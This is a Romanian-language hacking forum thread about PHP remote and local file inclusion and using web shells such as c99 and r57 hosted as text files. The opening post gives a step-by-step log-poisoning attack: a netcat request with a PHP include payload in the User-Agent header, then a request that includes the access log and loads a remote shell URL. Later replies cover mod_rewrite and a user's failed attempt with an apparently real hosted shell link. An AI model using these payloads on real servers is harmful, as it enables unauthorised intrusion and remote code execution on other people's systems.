Jump to content
zbeng

c100, c99, r57 - Hosted as TXT

Recommended Posts

RFI - REMOTE FILE INCLUSION (includerea unui script hostat pe alta masina*) are un impact major pentru ca ofera semi-shell access la serverul vulnerabil. in scripturile vulnerabile se pot include orice fell de scripturi dar 99% din cei care xploateaza asa ceva folosesc aceste shelluri pentru ca au o interfata user friendly.

poate fi inclusa orice extensie de file cu anumite modificari (txt si orice extensie de poza pot fi incluse direct pentru ca vor fi interpretate ca text, php html si alte orice extensii pot fi incluse folosind mod rewrite pe serverul unde este hostat shellul fortzand serverul sa le interpreteze ca text file si sa nu se execute pe el).

LFI - LOCAL FILE INCLUSION (bunicul remote file inclusionului permite includerea unui fisier local) are cam acelasi impact cu RFI dar este mai anevoios de exploatat. una din cele mai folosite metode de exploatare este injectarea logurilor pe care voi incerca sa ti'o explic cat mai simplu:

in mod normal lfi este useless neputand sa executi fisiere care iti vor da vreun tip de acces la server dar mintea hackerului a gasit o metoda sa il faca folositor. cum ? injectand logurile cu php code . cum se face asta ? eu personal folosesc netcat. metoda este simplista odata ce ajungi sa o cunosti, partea grea este gasirea logurilor

parte ce nu o voi aprofunda pentru ca E GREA. presupunem ca logurile au fost gasite .

se deschide o conexiune netcat catre hostul vulnerabil pe portul http (80).

se trimit http headere malformate care evident vor fi inregistrate de catre loguri fie in error log fie in access log.

Exemplu de headere malformate:

GET / HTTP/1.1

Host: www.victima.com

User-Agent: MOZILLA<? include($_GET[rfi]); ?>

Hostul va executa cererea si va salva in loguri accesul.

exploatatorul va include apoi logul ca in urmatorul exemplu:

http://www.victima.com/vulnerabil.php?parametruvulnerabil=/path/to/log/acces.log?rfi=http://phpshelllocation?

astfel fiserul vulnerabil a inclus logul si a executat codul vulnerabil injectat de tine obtinand un RFI care iti va permite un acces mai larg la host.

exista si alte metode de exploatare a LFI si nu stau sa le enumar.

PS pentru ceilalti utilizatori de pe forum luati exemplu de la vali si invatati cum sa intrebari, astfel va vom raspunde si voua la fel de frumos si nu cu ban sau ironii.

*masina = pc/server/host

Link to comment
Share on other sites

multumesc. ideea e in felul urmator... informatica asta are muulte laturi :) d`oh :P si cand te apuci de ceva ce nu stii cei mai grei pasi ,dupa parerea mea, sunt primii. pentru ca odata invatat basicul incepi sa intelegi tutorialele sa cauti forumurile, sa faci experimente ... dar pana nu ai primii pasi te uiti ca prostu si poate sa fie frustrant. Dar eu am perseverenta :D

Link to comment
Share on other sites

frumos explicat, dude.

ai o mica greseala:

mod rewrite este un modul de apache care transforma din link in genul:

http://site.com/view/product/1234

in

http://site.com/view.php?product=1234

este doar un exemplu. linkurile sunt mai friendly asa.. si din pacate mai greu de exploatat sql injection

Permite-mi sa te corectez..poate ai spus tu corect dar nu am inteles eu :P .

Se transforma:

din:

http://site.com/view.php?product=1234

in:

http://site.com/view/product/1234

exemplu:


RewriteRule ^view/product/([^/]*)+$ product.php?=$1 [L]

Link to comment
Share on other sites

de shell ai nevoie la RFI de exemplu www.site.com/index.php?page=[aici bagi linku shellului]

si cand bagi un shell la urma sa fie shell.txt?

...sper ca teai lamurit

am facut asa cum ai scris tu si nu am nici un rezultat, adica nu functioneaza.

poti sa fii un pic mai explicit?

si sigur e la sfarsit .txt? si nu .php

????

eu am incercat cu asta

http://continuumbuzz.com/uploads/images/2007-12-09/9omRMCPLrl.txt?

si nimik....

Service Temporarily Unavailable

The server is temporarily unable to service your request due to maintenance downtime or capacity problems. Please try again later.

The precondition on the request for the URL /index.php evaluated to false.

cam asa dau raspunsurile....

s-a stricat treaba cu ele?

sau care e smecheria?

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...